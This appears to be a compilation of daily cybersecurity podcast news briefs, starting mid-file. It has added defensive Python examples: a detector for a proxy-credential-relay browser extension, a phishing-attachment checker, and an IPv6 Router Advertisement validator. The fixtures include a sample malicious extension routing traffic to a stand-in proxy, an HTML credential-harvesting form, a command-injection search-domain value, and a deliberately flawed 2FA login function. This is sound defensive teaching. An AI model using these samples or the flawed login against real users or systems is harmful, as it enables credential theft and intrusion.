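    stored = DIRECTORY.get(username.lower())
    return stored is not None and stored == password


@dataclass(frozen=True)
class AuthResult:
    authenticated: bool
    second_factor_required: bool


def login_vulnerable(username: str, password: str) -> AuthResult:
    """Two lookups that disagree on case: 'ALICE' binds successfully, but the
    exact-case policy lookup misses the 'alice' entry, so no second factor
    is requested. This is the shape of the bug, not Fortinet's code."""
    if not ldap_bind(username, password):
        return AuthResult(False, False)
    mode = TWO_FACTOR_USERS.get(username)          # exact-case lookup: the defect
    return AuthResult(True, mode not in (None, "none"))


def login_hardened(username: str, password: str) -> AuthResult:
    """Canonicalize once, reuse the canonical name for every policy decision,
    and fail closed: a user with no explicit policy entry still gets 2FA."""
    canonical = username.strip().lower()
    if not ldap_bind(canonical, password):
        return AuthResult(False, False)
    mode = TWO_FACTOR_USERS.get(canonical, "fortitoken")   # unknown -> require 2FA
    return AuthResult(True, mode != "none")


if __name__ == "__main__":
    for name in ("alice", "ALICE", "Alice"):
        print(name, login_vulnerable(name, DIRECTORY["alice"]),
              login_hardened(name, DIRECTORY["alice"]))
```

The hardening is not only lowercasing: the canonical identity should be whatever the directory actually matched (the DN or sAMAccountName returned by the bind), and the policy table should default to requiring the second factor when it has no entry for that identity.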
Welcome to your daily cybersecurity podcast.

A new initiative brings together volunteer cybersecurity experts to help protect water utilities against growing cyber threats. Experienced professionals from the DEF CON Franklin community are paired with water service providers across several U.S. states to conduct assessments, map operational technology (OT) environments, and implement security measures tailored to critical infrastructure constraints. This community-driven model aims to offset limited internal resources and improve resilience against targeted industrial cyberattacks.

MongoDB has issued an urgent warning asking administrators to immediately patch a severe remote code execution vulnerability affecting components of its ecosystem. The flaw could allow unauthenticated attackers to execute arbitrary code on exposed Node.js servers. Proof-of-concept exploits are publicly available, significantly increasing the risk of real-world exploitation.

Security researchers have uncovered a large-scale compromise campaign involving the PCPcat malware, which exploited critical flaws in Next.js and React server components. More than 59,000 servers were compromised within 48 hours, with attackers harvesting credentials, SSH keys, and environment variables while establishing persistent access using stealthy processes and tunnels.

In France, La Poste and its banking subsidiary, La Banque Postale, suffered major service disruptions following a distributed denial-of-service (DDoS) attack during the holiday period. Several online services, including parcel tracking and digital banking, were rendered unavailable. Authorities stated that no customer data was compromised.

Finally, security teams are monitoring increased risks linked to modern JavaScript server stacks, highlighting how the rapid adoption of frameworks such as React and Next.js has expanded the attack surface for automated, industrial-scale exploitation.

Sources:
Cyber volunteers / water utilities / MSSP: https://therecord.media/cyber-volunteer-water-utility-mssp
MongoDB – severe RCE patch warning: https://www.bleepingcomputer.com/news/security/mongodb-warns-admins-to-patch-severe-rce-flaw-immediately/
PCPcat – React/Next.js servers breach: https://thecyberexpress.com/pcpcat-react-servers-nextjs-breach/
La Poste – outage after a cyberattack: https://securityaffairs.com/186064/security/la-poste-outage-after-a-cyber-attack.html

Don’t think, patch!
Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/
Welcome to your daily cybersecurity podcast.

CISA has added CVE-2023-52163 to its Known Exploited Vulnerabilities Catalog, confirming active exploitation of Digiever DS-2105 Pro network video recorders. This missing-authorization flaw allows unauthenticated attackers to bypass security controls. While BOD 22-01 mandates remediation only for federal agencies, CISA urges all organizations to prioritize firmware updates. Devices like this serve as a frequent entry point for actors targeting IoT infrastructure and physical security networks.

Genians Security Center reports on APT37's "Artemis" campaign targeting South Korean entities through malicious HWP documents. The attack chain leverages OLE objects and DLL side-loading via the legitimate VolumeId utility to deploy the RoKRAT module. The threat actor employs steganography within images and abuses cloud services such as Yandex and pCloud for C2 operations. This multi-stage procedure rides on legitimate execution flows to evade detection by signature-based security solutions.

SoundCloud disclosed a cyberattack targeting an ancillary service dashboard, resulting in a data leak affecting 26 million accounts. Exposed data includes email addresses and public profile information; passwords and financial data were not compromised. The incident was followed by DDoS attacks affecting availability. Remediation efforts, specifically reinforcing Identity and Access Management controls, inadvertently caused temporary connectivity issues for VPN users.

Socket Security identified two malicious Chrome extensions, named Phantom Shuttle, stealing credentials from more than 170 enterprise domains including AWS and GitHub. The extensions use onAuthRequired listeners to inject hard-coded proxy credentials and PAC scripts to reroute sensitive traffic through an attacker-controlled proxy. Operating as a man-in-the-middle, the malware exfiltrates plaintext credentials, session cookies, and API keys to the C2 server phantomshuttle[.]space every five minutes.

Anna’s Archive released a 300-terabyte dataset containing 86 million scraped Spotify tracks. The collection was built through systematic stream-ripping using third-party user accounts over several months. Spotify responded by disabling the offending accounts and implementing new safeguards to block automated playback patterns. This large-scale scraping of metadata and audio files represents a significant challenge for digital rights management and creator protection.

Sources:
CISA KEV – Digiever: https://www.cisa.gov/news-events/alerts/2025/12/22/cisa-adds-one-known-exploited-vulnerability-catalog
APT37 Artemis: https://www.genians.co.kr/en/blog/threat_intelligence/dll
SoundCloud breach: https://www.theregister.com/2025/12/16/soundcloud_cyberattack_data_leak/
Chrome Phantom Shuttle: https://thehackernews.com/2025/12/two-chrome-extensions-caught-secretly.html
Spotify scraping: https://therecord.media/spotify-disables-scraping-annas

Don’t think, patch!
Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/
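The Phantom Shuttle item above names the exact combination an extension needs to relay traffic through a proxy and answer its authentication challenge silently. The block below is an added triage check, not Socket's tooling: it inspects an unpacked extension's manifest and scripts for the proxy permission, a PAC script pushed through chrome.proxy.settings, and a webRequest.onAuthRequired listener returning hard-coded credentials. The manifest, scripts, credential and proxy address below are constructed (the address is from a documentation range), not indicators from the report.

```python
"""Triage check for the proxy-credential-injection pattern in the
Phantom Shuttle item. Added example, not Socket's code; sample inputs are
constructed to exercise the rules.
"""
import json
import re

# Permissions an MV3 extension needs to reroute traffic and answer proxy auth.
REROUTE_PERMS = {"proxy", "webRequest", "webRequestAuthProvider", "webRequestBlocking"}

PATTERNS = {
    "onAuthRequired_listener": re.compile(r"webRequest\.onAuthRequired\.addListener"),
    # authCredentials object whose password is a string literal in the source
    "hardcoded_authCredentials": re.compile(
        r"authCredentials\s*:\s*\{[^}]*password\s*:\s*['\"][^'\"]+['\"]"),
    # chrome.proxy.settings.set(...) switching the browser to a PAC script
    "pac_script_push": re.compile(r"proxy\.settings\.set\([^;]*pac_script", re.S),
    "proxy_directive": re.compile(r"PROXY\s+[\w.\-]+:\d{1,5}"),
}


def audit_extension(manifest_json: str, scripts: dict[str, str]) -> dict[str, list[str]]:
    """Return the reroute-capable permissions and the code patterns found."""
    manifest = json.loads(manifest_json)
    perms = set(manifest.get("permissions", []))
    findings = {"manifest": sorted(perms & REROUTE_PERMS), "code": []}
    for fname, src in scripts.items():
        for label, pattern in PATTERNS.items():
            if pattern.search(src):
                findings["code"].append(f"{fname}: {label}")
    return findings


def is_credential_relay(findings: dict[str, list[str]]) -> bool:
    """High-confidence verdict: the extension can set a proxy AND answers the
    proxy's auth challenge with a secret baked into its code."""
    labels = {entry.split(": ", 1)[1] for entry in findings["code"]}
    return ("proxy" in findings["manifest"]
            and "onAuthRequired_listener" in labels
            and "hardcoded_authCredentials" in labels)


# Constructed sample: the shape of a relay extension, not the real artifacts.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3, "name": "Shuttle Proxy", "version": "1.4.2",
    "permissions": ["proxy", "webRequest", "webRequestAuthProvider", "storage"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "background.js"},
})
SAMPLE_BACKGROUND = r"""
const pac = "function FindProxyForURL(url, host) {"
  + " if (host.endsWith('amazonaws.com') || host.endsWith('github.com'))"
  + "   return 'PROXY 203.0.113.10:3128';"
  + " return 'DIRECT'; }";
chrome.proxy.settings.set({value: {mode: "pac_script", pacScript: {data: pac}}, scope: "regular"});
chrome.webRequest.onAuthRequired.addListener(
  (details) => ({authCredentials: {username: "relay", password: "sample-secret"}}),
  {urls: ["<all_urls>"]}, ["blocking"]);
"""
BENIGN_MANIFEST = json.dumps({"manifest_version": 3, "name": "Notes", "version": "1.0",
                              "permissions": ["storage"]})
BENIGN_BACKGROUND = "chrome.storage.local.set({installed: Date.now()});"

if __name__ == "__main__":
    for label, manifest, script in (("sample", SAMPLE_MANIFEST, SAMPLE_BACKGROUND),
                                    ("benign", BENIGN_MANIFEST, BENIGN_BACKGROUND)):
        found = audit_extension(manifest, {"background.js": script})
        print(label, is_credential_relay(found), found)
```

Point it at the unpacked extension directories under the browser profile (one manifest plus its scripts per extension). A PAC script alone is common in legitimate proxy helpers; the verdict deliberately requires the onAuthRequired listener with literal credentials as well, which is what turns a proxy switcher into a silent credential relay.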
Welcome to your daily cybersecurity podcast.

Pornhub is alerting Premium subscribers following a data exposure on November 8, 2025, via analytics provider Mixpanel. Cybercriminals are threatening to contact affected users directly by email. Mixpanel disputes that the data originated from its November 8 security incident, stating it has no evidence of exfiltration from its systems. Pornhub confirms that passwords, payment details, and financial information remain uncompromised, with the exposure limited to a restricted set of analytics events. Attackers are exploiting this data for sextortion campaigns specifically targeting identified Premium users.

Intezer documents a Goffee group campaign targeting Russian military personnel and defense organizations. The initial attack, identified in October, uses a malicious XLL file uploaded to VirusTotal first from Ukraine and then from Russia, titled "enemy's planned targets". The file deploys the EchoGather backdoor to collect system information, execute commands, and exfiltrate files to a C2 server disguised as a food delivery website. Phishing lures include a fake concert invitation for senior military officers and a letter impersonating Russia's Ministry of Industry and Trade requesting pricing justification documents for defense contracts.

CISA and NIST release draft Interagency Report 8597 on protecting identity tokens and assertions against forgery, theft, and malicious use. The document addresses recent incidents at major cloud providers involving theft, modification, or forgery of identity tokens to access protected resources. The report covers IAM controls for systems that use digitally signed assertions and tokens in access decisions. NIST asks cloud service providers to apply Secure by Design principles, prioritizing transparency, configurability, and interoperability. Federal agencies must understand the architecture and deployment models of their CSPs to align risk posture with the threat environment.

Check Point Research documented GachiLoader, a heavily obfuscated Node.js loader distributed through the YouTube Ghost Network. The campaign leverages 39 compromised accounts spreading over 100 videos targeting game cheat users, accumulating 220,000 views since December 2024. The malware implements anti-analysis checks, including a 4 GB minimum RAM, 2 CPU cores, and blacklists for usernames, hostnames, and running processes. GachiLoader disables Windows Defender and adds exclusions for C:\Users, C:\ProgramData, C:\Windows, and the .sys extension. Two variants have been observed: the first downloads Rhadamanthys from C2 servers, while the second deploys Kidkadi.node, which uses a Vectored Exception Handling (VEH) technique to trace and intercept API calls and load a malicious PE.

Sources:
Pornhub sextortion: https://www.malwarebytes.com/blog/news/2025/12/pornhub-tells-users-to-expect-sextortion-emails-after-data-exposure
Goffee APT: https://therecord.media/cyber-spies-fake-new-year-concert-russian-phishing
NIST/CISA tokens: https://www.cisa.gov/news-events/alerts/2025/12/22/nist-and-cisa-release-draft-interagency-report-protecting-tokens-and-assertions-tampering-theft-and
GachiLoader: https://research.checkpoint.com/2025/gachiloader-node-js-malware-with-api-tracing/

Don’t think, patch!
Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/
Welcome to your daily cybersecurity podcast.

Most newly registered and parked domains are now serving malicious content. Analysis shows an increasing shift of domain parking services toward hosting phishing pages, fake software updates, and redirects to scam infrastructures. These domains are used as short-lived infrastructure to bypass reputation-based defenses and accelerate fraud and malware delivery campaigns.

The Iranian APT group Infy has resurfaced with a new targeted campaign. Operations rely on spear-phishing emails delivering weaponized documents using political and diplomatic lures. Payloads include updated backdoors, Windows registry-based persistence mechanisms, and obfuscated HTTP(S) C2 channels, indicating a structured operational comeback.

NIST has released new security guidance for the use of smart speakers in home-based telehealth environments. Identified risks include interception of unencrypted voice traffic, exposure of sensitive health data, and the use of these devices as pivot points into hospital systems. Recommended mitigations focus on encrypted communications, network segmentation, and strict access control.

Sources:
Malicious domain parking: https://krebsonsecurity.com/2025/12/most-parked-domains-now-serving-malicious-content/
APT Infy: https://thehackernews.com/2025/12/iranian-infy-apt-resurfaces-with-new.html
NIST smart speakers: https://www.nist.gov/news-events/news/2025/12/securing-smart-speakers-home-health-care-nist-offers-new-guidelines

Don’t think, patch!
Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/
Welcome to your daily cybersecurity podcast.

Amazon disclosed the detection of a North Korea-linked infiltration during an IT hiring process. A system administrator who claimed to be US-based was identified through persistent keyboard latency exceeding 110 milliseconds to Seattle servers, indicating intercontinental remote operation. The control infrastructure was traced to China. Since April 2024, Amazon reports blocking more than 1,800 fraudulent hiring attempts linked to North Korea, with a 27 percent quarterly increase.

A Russian APT actor is conducting a credential phishing campaign targeting government entities across the Baltics and the Balkans. The attacks rely on HTML attachments masquerading as PDF documents, embedding institutional decoys and fake authentication forms. Credentials are exfiltrated via formcarry.com, with consistent JavaScript and regex reuse observed since at least 2023.

Microsoft confirmed a global Microsoft Teams outage impacting message delivery across all regions and clients. The incident started at 14:30 ET and was fully resolved one hour later. No indicators of malicious activity were reported.

A malware campaign abuses Microsoft Office documents, SVG files, and compressed archives to compromise Windows systems. The attack chain exploits CVE-2017-11882, uses PNG steganography, and relies on process hollowing via RegAsm.exe to deliver RATs and information stealers.

ATM jackpotting attacks in the United States have been attributed to a criminal group deploying the Ploutus malware via physical access to ATMs. The tradecraft involves hard drive replacement or modification to control cash-dispensing modules. Losses are estimated to exceed $40 million since 2020.

Don’t think, patch.

Sources:
Amazon infiltration: https://www.clubic.com/actualite-592366-amazon-infiltre-par-un-espion-nord-coreen-finalement-repere-a-cause-de-sa-frappe-clavier.html
Russian APT phishing: https://strikeready.com/blog/russian-apt-actor-phishes-the-baltics-and-the-balkans/
Microsoft Teams outage: https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-teams-is-down-and-messages-are-delayed/
SVG and Office malware campaign: https://cybersecuritynews.com/hackers-weaponize-svg-files-and-office-documents/
ATM jackpotting / Ploutus malware: https://www.theregister.com/2025/12/19/tren_de_aragua_atm/

Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtenglishedition.substack.com/
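The Baltics and Balkans phishing item above gives a mail gateway two concrete things to check: an attachment that claims to be a PDF but is HTML, and an HTML form posting to a third-party collector such as formcarry.com. The block below is an added detection, not StrikeReady's code: it walks a MIME message, flags the type mismatch, and extracts every form action so the collector domain is visible to the analyst. The sample message, its addresses, and the form URL path are constructed for offline testing.

```python
"""Detection for HTML attachments posing as PDFs with an external credential
form (the lure described in the Baltics/Balkans phishing item). Added
example, not StrikeReady's code; the sample message is constructed.
"""
import email
import re
from email import policy
from email.message import EmailMessage

COLLECTOR_DOMAINS = {"formcarry.com"}      # named in the report; extend locally
HTML_TOKENS = (b"<!doctype html", b"<html", b"<script", b"<form")
FORM_ACTION = re.compile(r"<form[^>]*\baction\s*=\s*['\"]([^'\"]+)['\"]", re.I)


def looks_like_html(payload: bytes) -> bool:
    """Content-based check: ignore the declared type, look at the bytes."""
    head = payload[:2048].lower()
    return any(token in head for token in HTML_TOKENS)


def claims_pdf(part) -> bool:
    name = (part.get_filename() or "").lower()
    return name.endswith(".pdf") or part.get_content_type() == "application/pdf"


def attachment_findings(raw_message: bytes) -> list[dict]:
    """One finding per attachment: type mismatch, form targets, verdict."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        payload = part.get_payload(decode=True) or b""
        is_html = looks_like_html(payload)
        actions = FORM_ACTION.findall(payload.decode("utf-8", "replace")) if is_html else []
        collectors = [a for a in actions
                      if any(domain in a.lower() for domain in COLLECTOR_DOMAINS)]
        findings.append({
            "filename": part.get_filename(),
            "declared_type": part.get_content_type(),
            "is_html": is_html,
            "type_mismatch": is_html and claims_pdf(part),
            "form_actions": actions,
            "known_collector": collectors,
            # verdict: HTML that pretends to be a PDF, or HTML posting to a known collector
            "suspicious": is_html and (claims_pdf(part) or bool(collectors)),
        })
    return findings


def build_sample(attachment: bytes, filename: str, subtype: str) -> bytes:
    """Constructed message for offline testing; addresses are documentation domains."""
    m = EmailMessage()
    m["From"] = "registry@example.org"
    m["To"] = "officer@example.gov"
    m["Subject"] = "Document for review"
    m.set_content("Please review the attached document.")
    m.add_attachment(attachment, maintype="application", subtype=subtype, filename=filename)
    return m.as_bytes()


# Constructed lure: an HTML login form whose action is a formcarry.com endpoint
# (the path is invented), and a minimal real PDF for comparison.
LURE_HTML = b"""<!DOCTYPE html><html><body>
<form action="https://formcarry.com/s/sample-id" method="POST">
  <input name="email"><input name="password" type="password">
  <button>Open document</button>
</form></body></html>"""
REAL_PDF = b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog >>\nendobj\n%%EOF\n"

if __name__ == "__main__":
    for finding in attachment_findings(build_sample(LURE_HTML, "Decree_2025.pdf", "pdf")):
        print(finding)
```

The content check matters more than the filename rule: a lure delivered as a plain .html attachment still trips the verdict through its form action, and the extracted actions are worth logging even when the domain is not yet on the collector list, since the report notes the same JavaScript and regex reuse across campaigns since 2023.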
Welcome to your daily cybersecurity podcast.

French authorities arrested a 22-year-old individual following the compromise of Interior Ministry systems. The intrusion exposed email accounts and confidential documents, including judicial records and wanted-persons databases, and was claimed on BreachForums. The suspect maintained persistence on the network for several days. The Paris prosecutor's office charged the suspect with unauthorized access to a state system committed as part of an organized group, an offence punishable by up to ten years' imprisonment.

WatchGuard published advisory WGSA-2025-00027 addressing CVE-2025-14733, a critical out-of-bounds write in the Fireware OS iked process, CVSS 9.3. Active exploitation is confirmed, and the flaw enables unauthenticated remote code execution. Affected versions are 11.10.2 through 12.11.5 and 2025.1 through 2025.1.3. Patched versions are available, and WatchGuard provides four threat-actor IP addresses for hunting.

Riot Games researchers disclosed four CVEs affecting UEFI firmware on ASUS, Gigabyte, MSI, and ASRock motherboards. Because the IOMMU is not initialized early enough, a malicious PCIe device with physical access can modify system memory through DMA before the OS loads. Carnegie Mellon CERT/CC confirms broad impact. Firmware updates are available.

Cyderes documents CountLoader 3.2, distributed via cracked software; it persists with a Google-mimicking scheduled task that runs every thirty minutes and is set to repeat for ten years. It carries nine capabilities, including USB propagation, and deploys ACR Stealer. Check Point reports GachiLoader, spread via the YouTube Ghost Network through one hundred videos totalling 220,000 views. It deploys Kidkadi, which uses Vectored Exception Handling for PE injection, with the Rhadamanthys stealer as final payload.

CNIL issued a one-million-euro penalty against Mobius Solutions for unlawful retention of 46 million Deezer records after termination of its contract. The data leaked to the darknet from an unsecured test environment. CNIL confirms the extraterritorial application of GDPR.

Don't overthink it. Patch.

Sources:
France arrest: https://therecord.media/france-interior-ministry-hack-arrest
WatchGuard: https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00027
UEFI: https://www.bleepingcomputer.com/news/security/new-uefi-flaw-enables-pre-boot-attacks-on-motherboards-from-gigabyte-msi-asus-asrock/
Loaders: https://thehackernews.com/2025/12/cracked-software-and-youtube-videos.html
CNIL: https://www.zdnet.fr/actualites/fuite-massive-sur-le-darknet-la-cnil-frappe-fort-contre-un-ancien-sous-traitant-de-deezer-487023.htm

Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtintl.substack.com
Welcome to your daily cybersecurity podcast.

The Clop ransomware group, also tracked as Cl0p, is conducting a new data theft extortion campaign targeting Internet-exposed Gladinet CentreStack servers. Ongoing investigations confirm active scanning, successful intrusions, and the placement of extortion notes on compromised systems. The initial access vector remains unidentified, raising the possibility of a zero-day vulnerability or exploitation of unpatched systems. This activity aligns with Clop’s established focus on file sharing and secure file transfer platforms.

CISA has added three actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog. CVE-2025-20393 affects multiple Cisco products through improper input validation. CVE-2025-40602 impacts SonicWall SMA1000 appliances due to a missing authorization flaw. CVE-2025-59374 targets ASUS Live Update, involving malicious code embedded within the update mechanism, a software supply chain compromise scenario.

CERT-FR has issued advisory CERTFR-2025-AVI-1116 covering multiple vulnerabilities in Google Chrome. Affected versions include releases prior to 143.0.7499.146 on Linux and prior to 143.0.7499.146 or .147 on Windows and macOS. The advisory references CVE-2025-14765 and CVE-2025-14766, with limited public technical detail on the underlying impact.

A critical FreeBSD vulnerability, CVE-2025-14558, enables remote code execution via crafted IPv6 Router Advertisement packets within the SLAAC mechanism. Insufficient validation of RA messages leads to command injection into an internal shell script. Exploitation requires the attacker to be present on the same network segment, since Router Advertisements are link-local traffic. The vulnerability carries a CVSS score of 9.8.

North Korean cyber operations reached a record level in 2025, with more than two billion dollars in cryptocurrency stolen, according to Chainalysis. These activities combine attacks against centralized services, large-scale personal wallet compromises, and advanced social engineering operations involving fake recruiters and purported investors.

FIRST, the Forum of Incident Response and Security Teams, highlights the operational importance of incident communications, emphasizing the role of secure alternative channels, third-party coordination mechanisms, and controlled delegation of public communications to reduce secondary risk during major cyber incidents.

Finally, a coordinated operation supported by Eurojust dismantled fraudulent call centre operations in Ukraine. The transnational criminal network relied on industrial-scale social engineering techniques, with identified losses exceeding ten million euros and forty-five suspects identified across multiple countries.

Don’t overthink it. Patch.

Sources:
Clop / Gladinet: https://www.bleepingcomputer.com/news/security/clop-ransomware-targets-gladinet-centrestack-servers-for-extortion/
CISA KEV: https://www.cisa.gov/news-events/alerts/2025/12/17/cisa-adds-three-known-exploited-vulnerabilities-catalog
CERT-FR Chrome: https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-1116/
FreeBSD RCE: https://www.security.nl/posting/917946/Kritiek+beveiligingslek+in+FreeBSD+maakt+remote+code+execution+mogelijk?channel=rss
DPRK crypto: https://www.theregister.com/2025/12/18/north_korea_stole_2b_crypto_2025/
FIRST comms: https://www.first.org/blog/20251216-upskilling_communications
Eurojust fraud: https://www.eurojust.europa.eu/news/fraudulent-call-centres-ukraine-rolled

Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtintl.substack.com
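The FreeBSD item above says RA-carried values reached a shell script without validation. The block below is an added example and not FreeBSD's code: it decodes the two RA options that carry DNS configuration (RDNSS, type 25, and DNSSL, type 31, both from RFC 8106) and shows the validation step that is missing in that description, namely rejecting any search domain that is not a well-formed hostname before it can be passed to anything shell-like. The RA bytes are built in the block from constructed values, and the injected label is illustrative rather than taken from the advisory.

```python
"""Parser and input validation for the RA options that carry DNS settings
(RDNSS type 25, DNSSL type 31; RFC 8106). Added example, not FreeBSD's
code; the Router Advertisement is constructed locally and never sent.
"""
import ipaddress
import re
import struct

ICMPV6_ROUTER_ADVERT = 134
OPT_RDNSS, OPT_DNSSL = 25, 31
HOST_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def parse_ra_options(icmpv6: bytes) -> list[tuple[int, bytes]]:
    """Split the TLV options that follow the 16-byte RA header."""
    if len(icmpv6) < 16 or icmpv6[0] != ICMPV6_ROUTER_ADVERT:
        raise ValueError("not an ICMPv6 Router Advertisement")
    opts, off = [], 16
    while off + 2 <= len(icmpv6):
        typ, units = icmpv6[off], icmpv6[off + 1]   # length is in 8-octet units
        if units == 0 or off + units * 8 > len(icmpv6):
            raise ValueError("malformed option length")
        opts.append((typ, icmpv6[off + 2: off + units * 8]))
        off += units * 8
    return opts


def decode_rdnss(body: bytes) -> list[str]:
    """body = reserved(2) lifetime(4) then 16-byte IPv6 addresses."""
    addrs = body[6:]
    return [str(ipaddress.IPv6Address(addrs[i:i + 16]))
            for i in range(0, len(addrs) - len(addrs) % 16, 16)]


def decode_dnssl(body: bytes) -> list[str]:
    """body = reserved(2) lifetime(4) then names in DNS wire format, zero-padded.
    Labels are arbitrary octets on the wire; nothing here is trusted yet."""
    names, labels, pos = [], [], 6
    while pos < len(body):
        n = body[pos]
        pos += 1
        if n == 0:                       # end of a name, or trailing padding
            if labels:
                names.append(".".join(labels))
                labels = []
            continue
        if n > 63 or pos + n > len(body):   # also rejects compression pointers
            raise ValueError("malformed DNSSL label")
        labels.append(body[pos:pos + n].decode("latin-1"))
        pos += n
    return names


def safe_search_domains(names: list[str]) -> tuple[list[str], list[str]]:
    """Accept only RFC 1123-shaped hostnames; anything else (shell
    metacharacters, spaces, empty labels) is rejected, not escaped."""
    accepted, rejected = [], []
    for name in names:
        ok = 0 < len(name) <= 253 and all(HOST_LABEL.match(lbl) for lbl in name.split("."))
        (accepted if ok else rejected).append(name)
    return accepted, rejected


def build_ra(search_domains: list[str], dns_servers: list[str]) -> bytes:
    """Constructed RA for offline testing (checksum left zero, not transmitted)."""
    hdr = struct.pack("!BBHBBHII", ICMPV6_ROUTER_ADVERT, 0, 0, 64, 0, 1800, 0, 0)
    rd = struct.pack("!HI", 0, 1800) + b"".join(
        ipaddress.IPv6Address(a).packed for a in dns_servers)
    rdnss = bytes([OPT_RDNSS, (2 + len(rd)) // 8]) + rd
    wire = b""
    for domain in search_domains:
        for lbl in domain.split("."):
            raw = lbl.encode("latin-1")
            wire += bytes([len(raw)]) + raw
        wire += b"\x00"
    body = struct.pack("!HI", 0, 1800) + wire
    body += b"\x00" * ((-(2 + len(body))) % 8)   # pad option to 8-octet multiple
    dnssl = bytes([OPT_DNSSL, (2 + len(body)) // 8]) + body
    return hdr + rdnss + dnssl


if __name__ == "__main__":
    ra = build_ra(["corp.example", "x$(id);example.com"], ["2001:db8::53"])
    for typ, body in parse_ra_options(ra):
        if typ == OPT_DNSSL:
            print(safe_search_domains(decode_dnssl(body)))
```

The point of the validator is that it is an allow-list on shape rather than a deny-list on characters: a search domain that passes can be written into a resolver configuration or handed to a helper script without further quoting, and anything a link-local attacker stuffs into a label is dropped at the boundary.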
Welcome to your daily cybersecurity podcast.

CISA added CVE-2025-59718 to its Known Exploited Vulnerabilities catalog on December 16th. The flaw affects Fortinet FortiOS, FortiSwitchManager, FortiProxy, and FortiWeb through improper cryptographic signature verification in FortiCloud SSO SAML authentication. Unauthenticated attackers can bypass authentication via crafted SAML messages. Active exploitation is confirmed. CVE-2025-59719 addresses the same underlying issue. Federal agencies face a December 23rd remediation deadline. No ransomware campaign linkage is confirmed at this time.

CERT-FR issued advisory CERTFR-2025-AVI-1117 concerning GLPI. Two vulnerabilities, CVE-2025-59935 and CVE-2025-64520, affect GLPI versions from 9.1.0 up to, but not including, 10.0.21. Risks include XSS injection and security policy bypass. Fixes are available via GitHub security advisories GHSA-62p9-prpq-j62q and GHSA-j8vv-9f8m-r7jx, published December 16th.

Cisco reports CVE-2025-20393, a critical AsyncOS zero-day affecting Secure Email Gateway and Secure Email and Web Manager when the Spam Quarantine is exposed to the Internet in non-standard configurations. Active exploitation since late November is attributed to the Chinese group UAT-9686, deploying AquaShell backdoors, AquaTunnel and Chisel reverse SSH tunnels, and the AquaPurge log-clearing tool. Links are identified to UNC5174 and APT41. No patch is available. Cisco recommends access restriction and network segmentation, and rebuilding compromised appliances as the sole eradication option.

SonicWall patched CVE-2025-40602, a local privilege escalation in the SMA1000 Appliance Management Console. It is exploited in a chain with CVE-2025-23006, a critical deserialization flaw with a CVSS score of 9.8 already fixed in January. Combined exploitation enables unauthenticated remote code execution as root. The chain was discovered by Google Threat Intelligence Group. Fixed version: build 12.4.3-02856 and higher. Over 950 SMA1000 appliances remain exposed according to Shadowserver.

Finally, Recorded Future documents a sustained APT28 phishing campaign targeting UKR.net users between June 2024 and April 2025. UKR.net-themed login pages hosted on Mocky were distributed via PDF attachments in phishing emails. Links were shortened via tiny.cc or tinyurl.com, with some redirections through Blogger subdomains. The pages capture credentials and 2FA codes. The attackers transitioned to ngrok and Serveo proxy services following early 2024 infrastructure takedowns. The operation is attributed to Russia's GRU and collects intelligence on Ukrainian targets amid the ongoing conflict.

Don't think, just patch!

Sources:
CISA KEV: https://www.cisa.gov/news-events/alerts/2025/12/16/cisa-adds-one-known-exploited-vulnerability-catalog
CERT-FR: https://www.cert.ssi.gouv.fr/avis/CERTFR-2025-AVI-1117/
Cisco AsyncOS: https://www.bleepingcomputer.com/news/security/cisco-warns-of-unpatched-asyncos-zero-day-exploited-in-attacks/
SonicWall: https://www.bleepingcomputer.com/news/security/sonicwall-warns-of-new-sma1000-zero-day-exploited-in-attacks/
APT28: https://thehackernews.com/2025/12/apt28-targets-ukrainian-ukr-net-users.html

Your feedback is welcome.
Email: radiocsirt@gmail.com
Website: https://www.radiocsirt.com
Weekly Newsletter: https://radiocsirtintl.substack.com
Welcome to your daily cybersecurity podcast.

QNAP discloses a high-severity authentication bypass vulnerability tracked as CVE-2025-59385. The flaw allows remote attackers to spoof authentication mechanisms and access protected resources without credentials. The issue affects QTS and QuTS hero systems and is remotely exploitable with no user interaction. Patches are available in QTS 5.2.7.3297 and in the QuTS hero 5.2.7 and 5.3.1 builds released on October 24.

A second QNAP vulnerability, CVE-2025-62848, exposes QTS and QuTS hero systems to remote denial-of-service attacks. The issue stems from a NULL pointer dereference and can be triggered over the network without authentication. Successful exploitation leads to system crashes and service disruption. Fixed versions mirror those released for CVE-2025-59385.

Trend Micro reveals a previously unseen controller linked to BPFDoor malware, enabling encrypted reverse shells, direct shell access, and lateral movement across Linux servers. The backdoor leverages Berkeley Packet Filter mechanisms to remain stealthy and firewall-agnostic. Activity is attributed with medium confidence to the Earth Bluecrow APT group and targets telecommunications, finance, and retail sectors across Asia and the Middle East.

CISA adds two actively exploited vulnerabilities to its Known Exploited Vulnerabilities catalog. CVE-2025-14611 affects Gladinet CentreStack and Triofox via hard-coded cryptographic keys, while CVE-2025-43529 is a WebKit use-after-free flaw impacting multiple Apple products. Federal agencies are required to remediate under BOD 22-01, with strong recommendations extended to all organizations.

